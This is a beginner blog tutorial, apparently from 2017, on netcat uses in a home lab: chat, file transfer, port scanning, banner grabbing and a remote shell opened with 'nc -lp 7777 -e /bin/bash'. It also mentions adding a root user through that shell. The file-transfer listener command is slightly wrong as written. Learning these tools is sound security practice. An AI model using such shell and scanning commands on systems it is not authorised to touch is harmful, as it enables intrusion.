0P3N Blog Blog Post

What Holds the Hacker's Heart? NetCat

By: Mr. Sirja
May 30, 2017
Hello, Cybrarians!Do you know what NetCat is?  We can say NetCat is the heart of the Hacker, Pentesters and Security ninjas. Well, it first surfaced in 1995 and it is one of the most popular and very lightweight Network Security Tools.Netcat lets computers transfer data with each other via TCP & UDP protocols.We'll learn some basic uses of Netcat like chat or messaging server, file transfer, banner grabbing (for finding the operating system, services, versions, etc.), port scanning or even more.I've divided this tutorial into 5 section of Netcat:
  1.  Chat Between Two Machines with Netcat
  2.  Transfer Files  Between Two Machines
  3.  Port scanning
  4.  Banner Grabbing
  5.  Remote shells from Ubuntu into Kali Linux
Let's learn briefly about each section without wasting time.
1. Chat Between Two Machines with Netcat:
  • We can use Netcat for a simple chat interface. You can use two instances in Netcat running on one computer in any operating system you want. In the two instances, one instance will be a listener and the other will be a client. I will be connecting over TCP port 7777. Here, 7777 is the port number where the Netcat service will run.
  • Now, first of all, we are going to go ahead and start with our listener machine. On listener machine, type nc -l -p 7777 , where 7777 might be anything.
  • Let's going deep into this code,nc = For Netcat-l = Listen mode for inbound connects-p = Port where Netcat will listen for a new connection.
This machine listening for new connection
  • Now, check the IP Address of Listener Machine. Type ifconfig in Ubuntu machine.
IP address of listener machine
  • Now, in Client Machine type nc 10.0.1.102 7777 and press enter. Where 10.0.1.102 is Listener Machine's IP Address. This will activate the other end connection as the client.
Client Machine
  • Now, type some Message and check in listener machine.
Listener machine get message
  • Note that it's completely unencrypted, but it does let you chat.
2. Transfer Files  Between Two Machines:
  • So, we get a basic knowledge of Netcat and we move to transfer files between two machines using Netcat.
  • Suppose I have two machines. One is Ubuntu and another one is Kali Linux and I want to transfer netcat.txt file over Kali linux machine to my Ubuntu machine.
  • In the machine you want receive file, make it the listener and type the code below:
  • nc -v -w 30 7777 > netcat.txt
  • Let's go deep into this code:-v = Verbous. Using it gives you feedback during an operation on the screen.-w 30 = It tells that Netcat wait 30 seconds before timing out after transfer is initiated and also terminate connection after 30 seconds after transfer is complete.-l = This PC should be a listener.< netcat.txt = It means that this machine will listening for that file.
Machine is listening for netcat.txt file
  • So, now on the Kali Linux Machine, type following command in terminal & press enter:
  • nc -v -w 4 192.168.1.6 7777 < netcat.txt
  • Here -w 4 means Netcat will wait 4 seconds before canceling the transfer if the connection is lost.
Transferring file from kali linux to ubuntu machine
  • Now, look at the listener machine. You can see that netcat.txt file is transferred.
File received3. Port Scanning:
  • When you think about Port Scanning, which programs first come to mind? Nmap or angry IP scanner, right?
  • Netcat is not an advanced program for port scanning like Nmap. Netcat can perform a very basic scan for open ports. Let's check this out.
  • Type the command below command in terminal:
  • nc -v -w 5 10.0.1.101 -z 1-1000
  • Here, Netcat scans the range of ports from 1 to 1000 and will give the result
  • Here, I am using Kali Linux machine for the port scan
Port scan result - here 1 port is open 4. Banner Grabbing:
  • Banner grabbing is little bit more complex than the others.
  • It is useful for Penetration Testing or on a specific port or you need to find out what version or patches running on a server.
  • Type nc 10.0.1.101 80 then press enter and type:
  • HTTP/1.1 200 and Press Enter.
null
  • You can also Grab banners of any DNS. Type following command:
  • nc www.google.com 80
  • Get / HTTP/1.1
5. Remote shells from Ubuntu into Kali Linux:
  • For this, we actually need a sudo permission to get the remote shell into Kali Linux machine.
  • This is one of my favorite features of Netcat.
  • A remote shell is like a computer program like cmd or terminal.
  • On the Ubuntu Machine type:nc -lp 7777 -vv -e /bin/bash
  • On the Kali Linux Machine type:nc 10.0.1.102 7777 & press enter
  • Yeah great! We have a remote shell of Ubuntu machine on the Kali Linux machine. So you can make files, copy and move files, remove files and so many other things.
Got shell in Kali Linux
  • Note that Netcat can run also Remote Shell from another port through a server outside of a Firewall. So it's not recommended that both machines be on the same networks.
  • So we can do anything with this Remote Shell. We can also add root user on Ubuntu machine with this remote shell.
 
Have questions or comments about what I said? Feel free to comment and I will reply as soon as possible.
You can have lots of fun with Netcat including chat, transferring files, banner grabbing, port scanning and the best one is remote shell. I also want to know how you guys use Netcat. If you know something extra, please comment below and if you like my tutorial share with your friends and family.Happy Hacking ...

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry